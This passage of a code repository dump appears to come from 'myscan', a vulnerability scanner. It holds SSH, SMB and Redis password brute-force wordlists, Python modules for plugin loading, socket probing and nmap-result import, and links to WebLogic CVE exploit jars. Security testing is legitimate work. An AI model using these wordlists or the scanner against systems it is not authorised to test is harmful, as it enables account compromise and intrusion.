-------------------------------------------------------------------------------- 1 | admin 2 | admin12 3 | admin888 4 | admin8 5 | admin123 6 | sysadmin 7 | adminxxx 8 | adminx 9 | 6kadmin 10 | base 11 | feitium 12 | admins 13 | root 14 | roots 15 | test 16 | test1 17 | test123 18 | test2 19 | password 20 | aaaAAA111 21 | 888888 22 | 88888888 23 | 000000 24 | 00000000 25 | 111111 26 | 11111111 27 | aaaaaa 28 | aaaaaaaa 29 | 135246 30 | 135246789 31 | 123456 32 | 654321 33 | 12345 34 | 54321 35 | 123456789 36 | 1234567890 37 | 0 38 | 123qwe 39 | 123qweasd 40 | qweasd 41 | 123asd 42 | qwezxc 43 | qazxsw 44 | qazwsx 45 | qazwsxedc 46 | 1qaz2wsx 47 | zxcvbn 48 | asdfgh 49 | qwerty 50 | qazxdr 51 | qwaszx 52 | 111111 53 | 123123 54 | 123321 55 | abcdef 56 | abcdefg 57 | !@#$%^ 58 | !@#$% 59 | ~!@#$% 60 | %$#@! 61 | ^%$#@~! 62 | 88888 63 | 55555 64 | aaaaa 65 | asd123 66 | qweasdzxc 67 | zxcvb 68 | asdfg 69 | qwert 70 | 1 71 | 2 72 | 3 73 | 4 74 | 5 75 | qwe 76 | qwer 77 | welcome 78 | !@#123 79 | 111 80 | 12 81 | 123 82 | 123!@# 83 | 123654 84 | 123654789 85 | 123654789! 86 | 123go 87 | 1314520 88 | 133135136 89 | 13572468 90 | 19880118 91 | 1992724 92 | 20080808 93 | 3452510 94 | 360 95 | 360sb 96 | 376186027 97 | 3est 98 | 45189946 99 | 4816535 100 | 4lert -------------------------------------------------------------------------------- /myscan/data/brute/redis_pass: -------------------------------------------------------------------------------- 1 | 000000 2 | 000000000 3 | 0000000000 4 | 0000000000000000 5 | 0123456789 6 | 110120119 7 | 111111 8 | 111111111 9 | 1111111111 10 | 1111111111111111 11 | 123 12 | 123123 13 | 123123123 14 | 1233211234567 15 | 1234554321 16 | 123456 17 | 123456. 18 | 123456.. 19 | 123456789 20 | 123456789. 21 | 123456789.. 22 | 1234567890 23 | 12345678900 24 | 1234567891 25 | 12345678910 26 | 1234567891234567 27 | 1234567899 28 | 123456789a 29 | 123456789abc 30 | 123456789q 31 | 123456789qq 32 | 123456a 33 | 123456aa 34 | 123456abc 35 | 123456asd 36 | 123456q 37 | 123456qq 38 | 123698745 39 | 123abc 40 | 1314520520 41 | 135792468 42 | 1357924680 43 | 147258369 44 | 1472583690 45 | 19881230 46 | 1qaz2wsx 47 | 253013 48 | 5201314 49 | 5201314520 50 | 52013145201314 51 | 5841314520 52 | 741852963 53 | 7708801314520 54 | 789456123 55 | 7894561230 56 | 987654321 57 | 9876543210 58 | Passw0rd 59 | Password 60 | Password123 61 | Redis 62 | Redis123 63 | Redis@123 64 | Root@123 65 | a123123 66 | a123456 67 | a12345678 68 | a123456789 69 | a5201314 70 | aa123456 71 | aa123456789 72 | aaa123456 73 | abc123 74 | abc123456 75 | abc123456789 76 | abcd123 77 | abcd1234 78 | abcd123456 79 | admin 80 | admin123 81 | admin@123 82 | aini1314 83 | as123456 84 | asd123 85 | asd123456 86 | asdfghjkl 87 | foobared 88 | foobared123 89 | foobared123456 90 | foobared@123 91 | password123 92 | q123456 93 | q123456789 94 | qaz123456 95 | qazwsxedc 96 | qq123456 97 | qq123456789 98 | qq5201314 99 | qwe123 100 | qwe123456 101 | qwerty 102 | qwertyuiop 103 | redis 104 | redis123 105 | redis@123 106 | root 107 | root123 108 | root@123 109 | sunshine 110 | test 111 | test123 112 | w123456 113 | w123456789 114 | wang123456 115 | woaini 116 | woaini123 117 | !QAZ@WSX 118 | woaini1314 119 | woaini1314520 120 | woaini520 121 | woaini521 122 | www123456 123 | z123456 124 | z123456789 125 | zxc123 126 | zxc123456 127 | zxcvbnm 128 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/smb_pass: -------------------------------------------------------------------------------- 1 | 000000 2 | 000000000 3 | 0000000000 4 | 0000000000000000 5 | 0123456789 6 | 110120119 7 | 111111 8 | 111111111 9 | 1111111111 10 | 1111111111111111 11 | 123 12 | 123123 13 | 123123123 14 | 1233211234567 15 | 1234554321 16 | 123456 17 | 123456. 18 | 123456.. 19 | 123456789 20 | 123456789. 21 | 123456789.. 22 | 1234567890 23 | 12345678900 24 | 1234567891 25 | 12345678910 26 | 1234567891234567 27 | 1234567899 28 | 123456789a 29 | 123456789abc 30 | 123456789q 31 | 123456789qq 32 | 123456a 33 | 123456aa 34 | 123456abc 35 | 123456asd 36 | 123456q 37 | 123456qq 38 | 123698745 39 | 123abc 40 | 1314520520 41 | 135792468 42 | 1357924680 43 | 147258369 44 | 1472583690 45 | 19881230 46 | 1qaz2wsx 47 | 253013 48 | 5201314 49 | 5201314520 50 | 52013145201314 51 | 5841314520 52 | 741852963 53 | 7708801314520 54 | 789456123 55 | 7894561230 56 | 987654321 57 | 9876543210 58 | Passw0rd 59 | Password 60 | Password123 61 | Redis 62 | Redis123 63 | Redis@123 64 | Root@123 65 | a123123 66 | a123456 67 | a12345678 68 | a123456789 69 | a5201314 70 | aa123456 71 | aa123456789 72 | aaa123456 73 | abc123 74 | abc123456 75 | abc123456789 76 | abcd123 77 | abcd1234 78 | abcd123456 79 | admin 80 | admin123 81 | admin@123 82 | aini1314 83 | as123456 84 | asd123 85 | asd123456 86 | asdfghjkl 87 | foobared 88 | foobared123 89 | foobared123456 90 | foobared@123 91 | password123 92 | q123456 93 | q123456789 94 | qaz123456 95 | qazwsxedc 96 | qq123456 97 | qq123456789 98 | qq5201314 99 | qwe123 100 | qwe123456 101 | qwerty 102 | qwertyuiop 103 | redis 104 | redis123 105 | redis@123 106 | root 107 | root123 108 | root@123 109 | sunshine 110 | test 111 | test123 112 | w123456 113 | w123456789 114 | wang123456 115 | woaini 116 | woaini123 117 | !QAZ@WSX 118 | !QAZ2wsx 119 | woaini1314 120 | woaini1314520 121 | woaini520 122 | woaini521 123 | www123456 124 | z123456 125 | z123456789 126 | zxc123 127 | zxc123456 128 | zxcvbnm 129 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/smb_user: -------------------------------------------------------------------------------- 1 | administrator -------------------------------------------------------------------------------- /myscan/data/brute/ssh_pass: -------------------------------------------------------------------------------- 1 | 000000 2 | 000000000 3 | 0000000000 4 | 0000000000000000 5 | 0123456789 6 | 110120119 7 | 111111 8 | 111111111 9 | 1111111111 10 | 1111111111111111 11 | 123 12 | 123123 13 | 123123123 14 | 1233211234567 15 | 1234554321 16 | 123456 17 | 123456. 18 | 123456.. 19 | 123456789 20 | 123456789. 21 | 123456789.. 22 | 1234567890 23 | 12345678900 24 | 1234567891 25 | 12345678910 26 | 1234567891234567 27 | 1234567899 28 | 123456789a 29 | 123456789abc 30 | 123456789q 31 | 123456789qq 32 | 123456a 33 | 123456aa 34 | 123456abc 35 | 123456asd 36 | 123456q 37 | 123456qq 38 | 123698745 39 | 123abc 40 | 1314520520 41 | 135792468 42 | 1357924680 43 | 147258369 44 | 1472583690 45 | 19881230 46 | 1qaz2wsx 47 | 253013 48 | 5201314 49 | 5201314520 50 | 52013145201314 51 | 5841314520 52 | 741852963 53 | 7708801314520 54 | 789456123 55 | 7894561230 56 | 987654321 57 | 9876543210 58 | Passw0rd 59 | Password 60 | Password123 61 | Redis 62 | Redis123 63 | Redis@123 64 | Root@123 65 | a123123 66 | a123456 67 | a12345678 68 | a123456789 69 | a5201314 70 | aa123456 71 | aa123456789 72 | aaa123456 73 | abc123 74 | abc123456 75 | abc123456789 76 | abcd123 77 | abcd1234 78 | abcd123456 79 | admin 80 | admin123 81 | admin@123 82 | aini1314 83 | as123456 84 | asd123 85 | asd123456 86 | asdfghjkl 87 | foobared 88 | foobared123 89 | foobared123456 90 | foobared@123 91 | password123 92 | q123456 93 | q123456789 94 | qaz123456 95 | qazwsxedc 96 | qq123456 97 | qq123456789 98 | qq5201314 99 | qwe123 100 | qwe123456 101 | qwerty 102 | qwertyuiop 103 | redis 104 | redis123 105 | redis@123 106 | root 107 | root123 108 | root@123 109 | sunshine 110 | test 111 | test123 112 | w123456 113 | w123456789 114 | wang123456 115 | woaini 116 | woaini123 117 | !QAZ@WSX 118 | !QAZ2wsx 119 | woaini1314 120 | woaini1314520 121 | woaini520 122 | woaini521 123 | www123456 124 | z123456 125 | z123456789 126 | zxc123 127 | zxc123456 128 | zxcvbnm 129 | zxcvbnm123 -------------------------------------------------------------------------------- /myscan/data/brute/ssh_user: -------------------------------------------------------------------------------- 1 | root -------------------------------------------------------------------------------- /myscan/data/common/dns_servers.txt: -------------------------------------------------------------------------------- 1 | 119.29.29.29 2 | 114.114.114.114 3 | 223.5.5.5 4 | 180.76.76.76 5 | 101.6.6.6 -------------------------------------------------------------------------------- /myscan/htmllib/prism-http.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.http={"request-line":{pattern:/^(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b\shttps?:\/\/\S+\sHTTP\/[0-9.]+/,inside:{property:/^\b(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b/,"attr-name":/:\w+/}},"response-status":{pattern:/^HTTP\/1.[01] [0-9]+.*/,inside:{property:/[0-9]+[A-Z\s-]+$/i}},keyword:/^[\w-]+:(?=.+)/m};var httpLanguages={"application/json":Prism.languages.javascript,"application/xml":Prism.languages.markup,"text/xml":Prism.languages.markup,"text/html":Prism.languages.markup};for(var contentType in httpLanguages)if(httpLanguages[contentType]){var options={};options[contentType]={pattern:new RegExp("(content-type:\\s*"+contentType+"[\\w\\W]*?)\\n\\n[\\w\\W]*","i"),lookbehind:!0,inside:{rest:httpLanguages[contentType]}},Prism.languages.insertBefore("http","keyword",options)} -------------------------------------------------------------------------------- /myscan/htmllib/prism-javascript.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.javascript=Prism.languages.extend("clike",{keyword:/\b(break|case|catch|class|const|continue|debugger|default|delete|do|else|enum|export|extends|false|finally|for|function|get|if|implements|import|in|instanceof|interface|let|new|null|package|private|protected|public|return|set|static|super|switch|this|throw|true|try|typeof|var|void|while|with|yield)\b/,number:/\b-?(0x[\dA-Fa-f]+|\d*\.?\d+([Ee][+-]?\d+)?|NaN|-?Infinity)\b/,"function":/(?!\d)[a-z0-9_$]+(?=\()/i}),Prism.languages.insertBefore("javascript","keyword",{regex:{pattern:/(^|[^/])\/(?!\/)(\[.+?]|\\.|[^/\r\n])+\/[gim]{0,3}(?=\s*($|[\r\n,.;})]))/,lookbehind:!0}}),Prism.languages.markup&&Prism.languages.insertBefore("markup","tag",{script:{pattern:/[\w\W]*?<\/script>/i,inside:{tag:{pattern:/|<\/script>/i,inside:Prism.languages.markup.tag.inside},rest:Prism.languages.javascript},alias:"language-javascript"}}); -------------------------------------------------------------------------------- /myscan/htmllib/prism.min.css: -------------------------------------------------------------------------------- 1 | code[class*="language-"],pre[class*="language-"]{color:black;text-shadow:0 1px white;font-family:Consolas,Monaco,'Andale Mono',monospace;direction:ltr;text-align:left;white-space:pre;word-spacing:normal;word-break:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none}pre[class*="language-"]::-moz-selection,pre[class*="language-"] ::-moz-selection,code[class*="language-"]::-moz-selection,code[class*="language-"] ::-moz-selection{text-shadow:none;background:#b3d4fc}pre[class*="language-"]::selection,pre[class*="language-"] ::selection,code[class*="language-"]::selection,code[class*="language-"] ::selection{text-shadow:none;background:#b3d4fc}@media print{code[class*="language-"],pre[class*="language-"]{text-shadow:none}}pre[class*="language-"]{padding:1em;margin:.5em 0;overflow:auto}:not(pre)>code[class*="language-"],pre[class*="language-"]{background:#f5f2f0}:not(pre)>code[class*="language-"]{padding:.1em;border-radius:.3em}.token.comment,.token.prolog,.token.doctype,.token.cdata{color:slategray}.token.punctuation{color:#999}.namespace{opacity:.7}.token.property,.token.tag,.token.boolean,.token.number,.token.constant,.token.symbol,.token.deleted{color:#905}.token.selector,.token.attr-name,.token.string,.token.char,.token.builtin,.token.inserted{color:#690}.token.operator,.token.entity,.token.url,.language-css .token.string,.style .token.string{color:#a67f59;background:hsla(0,0,100%,.5)}.token.atrule,.token.attr-value,.token.keyword{color:#07a}.token.function{color:#dd4a68}.token.regex,.token.important,.token.variable{color:#e90}.token.important,.token.bold{font-weight:bold}.token.italic{font-style:italic}.token.entity{cursor:help} -------------------------------------------------------------------------------- /myscan/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/__init__.py -------------------------------------------------------------------------------- /myscan/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/__init__.pyc -------------------------------------------------------------------------------- /myscan/lib/bin/weblogic/CVE-2020-14645.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/bin/weblogic/CVE-2020-14645.jar -------------------------------------------------------------------------------- /myscan/lib/bin/weblogic/CVE-2020-2555.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/bin/weblogic/CVE-2020-2555.jar -------------------------------------------------------------------------------- /myscan/lib/bin/weblogic/CVE-2020-2883.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/bin/weblogic/CVE-2020-2883.jar -------------------------------------------------------------------------------- /myscan/lib/controller/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/controller/__init__.py -------------------------------------------------------------------------------- /myscan/lib/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/core/__init__.py -------------------------------------------------------------------------------- /myscan/lib/core/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/core/__init__.pyc -------------------------------------------------------------------------------- /myscan/lib/core/base.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-09 3 | # @Author : caicai 4 | # @File : base.py 5 | 6 | ''' 7 | poc的父类,继承一些通用方法 8 | ''' 9 | from myscan.lib.core.common import getmd5, getredis 10 | from myscan.lib.core.data import logger 11 | 12 | class PocBase(object): 13 | 14 | def can_output(self, msg, insert=False): 15 | ''' 16 | msg : should url+somename 17 | ''' 18 | 19 | msgmd5 = getmd5(msg) 20 | red = getredis() 21 | if insert == False: 22 | if not red.sismember("myscan_max_output", msgmd5): 23 | return True # 可以输出 24 | else: 25 | logger.debug("{} 输出个数已达一次,不再测试输出".format(msg)) 26 | return False # 不可以继续输出 27 | else: 28 | # red.hincrby("myscan_max_output", msgmd5, amount=1) 29 | red.sadd("myscan_max_output", msgmd5) 30 | -------------------------------------------------------------------------------- /myscan/lib/core/block_info.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : block_info.py 5 | from myscan.lib.core.common import getredis 6 | from myscan.config import scan_set 7 | from myscan.lib.core.data import logger 8 | 9 | 10 | class block_info(): 11 | def __init__(self, host, port): 12 | self.red = getredis() 13 | self.host_port = "{}_{}".format(host, port) 14 | self.count_res_key = "count_res_{}".format(self.host_port) # list 15 | self.block_key = "block" # set 16 | 17 | def push_result_status(self, status): 18 | ''' 19 | status [0,1] 20 | 0:状态正常 21 | 1:状态异常 22 | ''' 23 | # 查看主机是否被封算法 24 | # 把主机(host_port)最近两百个结果保存到redis,统计最近两百个结果timeout次数,达到80及为主机被封,不再处理。 25 | if not self.red.exists(self.count_res_key): 26 | for x in range(int(scan_set.get("block_count"))): 27 | self.red.rpush(self.count_res_key, "0") 28 | self.red.lpush(self.count_res_key, str(status)) 29 | self.red.ltrim(self.count_res_key, 0, int(scan_set.get("block_count")) - 1) 30 | r = self.red.lrange(self.count_res_key, 0, -1) 31 | error_nums = r.count(b"1") 32 | if error_nums >= int(scan_set.get("block_count")): 33 | if self.red.sadd(self.block_key, self.host_port) == 1: 34 | self.red.hincrby("count_all", "block_host", amount=1) 35 | logger.warning("{} blocked,never test it ".format(self.host_port)) 36 | return error_nums 37 | 38 | def is_block(self): 39 | if self.red.sismember(self.block_key, self.host_port): 40 | return True 41 | else: 42 | return False 43 | 44 | def block_it(self): 45 | self.red.sadd(self.block_key, self.host_port) 46 | -------------------------------------------------------------------------------- /myscan/lib/core/data.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : data.py 5 | from myscan.lib.core.datatype import AttribDict 6 | from myscan.lib.core.log import Logger 7 | 8 | cmd_line_options = AttribDict() 9 | 10 | paths = AttribDict() 11 | 12 | logger = Logger(logger="myscan") 13 | 14 | conn = AttribDict() 15 | 16 | count = AttribDict() 17 | 18 | others= AttribDict() 19 | -------------------------------------------------------------------------------- /myscan/lib/core/datatype.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : datatype.py 5 | from collections import OrderedDict 6 | import copy 7 | import types 8 | 9 | class AttribDict(OrderedDict): 10 | """ 11 | AttrDict extends OrderedDict to provide attribute-style access. 12 | Items starting with __ or _OrderedDict__ can't be accessed as attributes. 13 | """ 14 | __exclude_keys__ = set() 15 | 16 | def __getattr__(self, name): 17 | if (name.startswith('__') 18 | or name.startswith('_OrderedDict__') 19 | or name in self.__exclude_keys__): 20 | return super(AttribDict, self).__getattribute__(name) 21 | else: 22 | try: 23 | return self.get(name) 24 | except KeyError: 25 | raise AttributeError(name) 26 | 27 | def __setattr__(self, name, value): 28 | if (name.startswith('__') 29 | or name.startswith('_OrderedDict__') 30 | or name in self.__exclude_keys__): 31 | return super(AttribDict, self).__setattr__(name, value) 32 | self[name] = value 33 | 34 | def __delattr__(self, name): 35 | if (name.startswith('__') 36 | or name.startswith('_OrderedDict__') 37 | or name in self.__exclude_keys__): 38 | return super(AttribDict, self).__delattr__(name) 39 | del self[name] 40 | def __getstate__(self): 41 | return self.__dict__ 42 | 43 | def __setstate__(self, dict): 44 | self.__dict__ = dict 45 | 46 | # def __deepcopy__(self, memo): 47 | # retVal = self.__class__() 48 | # memo[id(self)] = retVal 49 | # 50 | # for attr in dir(self): 51 | # if not attr.startswith('_'): 52 | # value = getattr(self, attr) 53 | # if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): 54 | # setattr(retVal, attr, copy.deepcopy(value, memo)) 55 | # 56 | # for key, value in self.items(): 57 | # retVal.__setitem__(key, copy.deepcopy(value, memo)) 58 | # 59 | # return retVal 60 | -------------------------------------------------------------------------------- /myscan/lib/core/plugin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : languages.py 5 | from myscan.lib.core.data import cmd_line_options, paths, logger 6 | from myscan.lib.core.register import load_file_to_module 7 | import copy 8 | import traceback 9 | 10 | 11 | class plugin(): 12 | def __init__(self, dictdata): 13 | self.dictdata = dictdata 14 | self.run() 15 | 16 | def run(self): 17 | for plugin in cmd_line_options.open_lugins: 18 | try: 19 | c = load_file_to_module(plugin) 20 | class_plugin = c.plugin(copy.deepcopy(self.dictdata)) 21 | logger.debug("Start languages script:{}".format(plugin)) 22 | class_plugin.run() 23 | logger.debug("Done languages script:{}".format(plugin)) 24 | except Exception as ex: 25 | traceback.print_exc() 26 | logger.warning("run languages script:{} error:{}".format(plugin, ex)) 27 | -------------------------------------------------------------------------------- /myscan/lib/core/pythonplugin.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/5 3 | # @Author : caicai 4 | # @File : pythonplugin.py 5 | 6 | 7 | from myscan.lib.core.data import cmd_line_options 8 | import json 9 | from myscan.lib.core.common import getredis 10 | from myscan.lib.core.data import logger 11 | import traceback 12 | 13 | 14 | class python_plugin(): 15 | def __init__(self, workdata): 16 | self.workdata = workdata 17 | self.red = getredis() 18 | 19 | def run(self): 20 | dictdata = json.loads(self.red.hget(self.workdata.get("id"), "data")) 21 | # count==0 则删除,防止内存过大 22 | current_count = self.red.hincrby(self.workdata.get("id"), "count", amount=-1) 23 | if current_count == 0: 24 | logger.debug("Will delete data for id:{}".format(self.workdata.get("id"))) 25 | self.red.delete(self.workdata.get("id")) 26 | 27 | # self.workdata["dictdata"] = copy.deepcopy(dictdata) 28 | self.poc = self.workdata.get("poc") 29 | 30 | func_data = cmd_line_options.allow_plugin[self.workdata.get('pochash')].get("class", None) 31 | if func_data is None: 32 | logger.warning("{} poc not found,will kill this task".format(self.poc)) 33 | return 34 | func = func_data.POC 35 | class_poc = func(dictdata) 36 | logger.debug("Start python plugin script:{} ".format(self.poc)) 37 | try: 38 | class_poc.verify() 39 | # process = psutil.Process(os.getpid()) # os.getpid() 40 | # memInfo = process.memory_info() 41 | # print('pid: {}'.format(os.getpid()), int(memInfo.rss / 1024 / 1014), 'mb on {}'.format(os.path.basename(self.poc))) 42 | 43 | logger.debug("Done python plugin script:{} ".format(self.poc)) 44 | except Exception as ex: 45 | traceback.print_exc() 46 | -------------------------------------------------------------------------------- /myscan/lib/core/register.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : register.py 5 | import os 6 | from importlib import util 7 | from myscan.lib.core.data import logger 8 | 9 | 10 | def load_file_to_module(file_path): 11 | file_path = os.path.abspath(file_path) 12 | if not os.path.exists(file_path): 13 | logger.warning("load file error ,file no exist.") 14 | return 15 | try: 16 | module_name = 'pocs_{0}'.format(get_filename(file_path, with_ext=False)) 17 | spec = util.spec_from_file_location(module_name, file_path) 18 | mod = util.module_from_spec(spec) 19 | spec.loader.exec_module(mod) 20 | return mod 21 | 22 | except ImportError: 23 | error_msg = "load module failed! '{}'".format(file_path) 24 | raise 25 | 26 | 27 | def get_filename(filepath, with_ext=True): 28 | base_name = os.path.basename(filepath) 29 | return base_name if with_ext else os.path.splitext(base_name)[0] 30 | -------------------------------------------------------------------------------- /myscan/lib/core/threads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : threads.py 5 | import threading 6 | # import traceback 7 | from queue import Queue 8 | from myscan.lib.core.data import logger 9 | from myscan.lib.core.data import cmd_line_options 10 | 11 | 12 | def mythread(func, mapslist, thread_num=None): 13 | threads = [] 14 | queue = Queue() 15 | for i in mapslist: 16 | queue.put(i) 17 | if thread_num is None: 18 | thread_num = cmd_line_options.threads 19 | for x in range(0, int(thread_num)): 20 | threads.append(tThread(queue, func)) 21 | 22 | for t in threads: 23 | t.start() 24 | for t in threads: 25 | t.join() 26 | 27 | 28 | class tThread(threading.Thread): 29 | def __init__(self, queue, func): 30 | threading.Thread.__init__(self) 31 | self.queue = queue 32 | self.func = func 33 | 34 | def run(self): 35 | 36 | while not self.queue.empty(): 37 | arg = self.queue.get() 38 | try: 39 | self.func(arg) 40 | except Exception as e: 41 | logger.warning("run thread error:{}".format(str(e))) 42 | # traceback.print_exc() 43 | -------------------------------------------------------------------------------- /myscan/lib/helper/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/helper/__init__.py -------------------------------------------------------------------------------- /myscan/lib/helper/helper_socket.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-26 3 | # @Author : caicai 4 | # @File : helper_socket.py 5 | import socket 6 | import ssl 7 | 8 | 9 | def socket_send(data, address, timeout=8, recv_len=4096): 10 | ''' 11 | data: bytes 12 | address: list (ip,port) 13 | ''' 14 | res = None 15 | try: 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | sock.settimeout(timeout) 18 | sock.connect(address) 19 | sock.send(data) 20 | res = sock.recv(recv_len) 21 | sock.close() 22 | except Exception as ex: 23 | pass 24 | # ("socket_send get error:{}".format(ex)) 25 | return res 26 | 27 | 28 | def socket_send_withssl(data, address, timeout=8, recv_len=4096): 29 | ''' 30 | data: bytes 31 | address: list (ip,port) 32 | ''' 33 | res = None 34 | context = ssl._create_unverified_context() 35 | try: 36 | with socket.create_connection(address) as conn: 37 | with context.wrap_socket(conn) as sconn: 38 | sconn.settimeout(timeout) 39 | sconn.send(data) 40 | res = sconn.recv(recv_len) 41 | except Exception as ex: 42 | pass 43 | # log("socket_send_withssl get error:{}".format(ex)) 44 | return res -------------------------------------------------------------------------------- /myscan/lib/hostscan/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/common.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.core.data import logger 2 | import subprocess 3 | 4 | 5 | def get_data_from_file(filename): 6 | lines = [] 7 | try: 8 | with open(filename, errors="ignore") as f: 9 | for line in f: 10 | line = line.strip() 11 | if line: 12 | lines.append(line) 13 | except Exception as ex: 14 | logger.warning("get_data_from_file get error:{}".format(ex)) 15 | return lines 16 | 17 | 18 | # def get_class_from_jvm(jarpath,classname): 19 | # if not jpype.isJVMStarted(): 20 | # jvm_path = jpype.getDefaultJVMPath() 21 | # jpype.startJVM(jvm_path, "-Djava.class.path={}".format(jarpath), 22 | # convertStrings=True) 23 | # javaClass = jpype.JClass(classname) 24 | # return javaClass 25 | def start_process(args: list, timeout: int = 30): 26 | try: 27 | ret = subprocess.check_output(args, timeout) 28 | except subprocess.CalledProcessError as ex: 29 | return ex.output # Output generated before error 30 | return ret 31 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/from_json_import.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/30 3 | # @Author : caicai 4 | # @File : from_json_import.py 5 | 6 | 7 | import json 8 | 9 | 10 | def get_data_from_jsonfile(filename): 11 | datas = [] 12 | with open(filename, errors="ignore") as f: 13 | lines = f.readlines() 14 | for line in lines: 15 | try: 16 | dic = json.loads(line.strip()) 17 | datas.append( 18 | { 19 | "filter": dic.get("filter", True), 20 | "scan": dic.get("scan", False), 21 | "addr": str(dic.get("addr")), 22 | "port": int(dic.get("port")), 23 | "type": dic.get("type", "tcp"), 24 | "service": dic.get("service") 25 | } 26 | ) 27 | 28 | except Exception as e: 29 | print("process get_data_from_jsonfile error: {}".format(e)) 30 | return datas 31 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/from_nmap_text_import.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | 4 | def get_data_from_textfile(filename): 5 | datas = [] 6 | with open(filename,errors="ignore") as f: 7 | texts = f.read() 8 | hostsdata = re.findall( 9 | '(scan report.*?)Nmap', texts, re.S 10 | ) 11 | for host in hostsdata: 12 | ip = '' 13 | for line in host.split('\n'): 14 | if 'scan report for' in line: 15 | ip = line.split(' ')[3] 16 | elif '/tcp' in line or '/udp' in line: 17 | linesplit = re.split('\s+', line) 18 | try: 19 | port, service, version = linesplit[0], linesplit[2], ' '.join(linesplit[3:]) 20 | p,t=port.split("/",1) 21 | if re.search(".*?ttl \d{1,4}", version.strip()): 22 | version = re.search(".*?ttl \d{1,4}(.*?$)", version.strip()).group(1).strip() 23 | datas.append( 24 | { 25 | "filter": True, 26 | "scan": False, 27 | "addr": ip, 28 | "port": int(p), 29 | "type":t, 30 | "service": { 31 | service: version 32 | } 33 | 34 | } 35 | ) 36 | 37 | except Exception as e: 38 | print("process get_data_from_textfile error: {}".format(e)) 39 | return datas 40 | 41 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/input_sour/from_nmap_xml_import.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/lib/hostscan/pocbase.py: -------------------------------------------------------------------------------- 1 | class PocBase(): 2 | 3 | def check_rule(self,dictdata,require): 4 | ''' 5 | check the rule is right 6 | ''' 7 | if require.get("type","tcp") != dictdata.get("type",None): 8 | return False 9 | result=False 10 | for dict_service in dictdata.get("service").keys(): 11 | if result: 12 | return True 13 | for require_service in require.get("service"): 14 | if dict_service.lower() in require_service.lower(): 15 | result=True 16 | break 17 | return result -------------------------------------------------------------------------------- /myscan/lib/hostscan/start_input.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.hostscan.input_sour.from_nmap_text_import import get_data_from_textfile 2 | from myscan.lib.hostscan.input_sour.from_json_import import get_data_from_jsonfile 3 | 4 | from myscan.lib.core.data import cmd_line_options, logger 5 | from myscan.lib.core.common import getredis 6 | import traceback, json 7 | 8 | 9 | def start_input(): 10 | if cmd_line_options.command == "hostscan": 11 | try: 12 | red = getredis() 13 | if cmd_line_options.input_nmaptext: 14 | datas = get_data_from_textfile(cmd_line_options.input_nmaptext) 15 | logger.info("input {} lines from nmap_text".format(len(datas))) 16 | for data in datas: 17 | red.lpush("hostdata", json.dumps(data)) 18 | if cmd_line_options.input_jsonfile: 19 | datas = get_data_from_jsonfile(cmd_line_options.input_jsonfile) 20 | logger.info("input {} lines from nmap_json".format(len(datas))) 21 | for data in datas: 22 | red.lpush("hostdata", json.dumps(data)) 23 | except Exception as 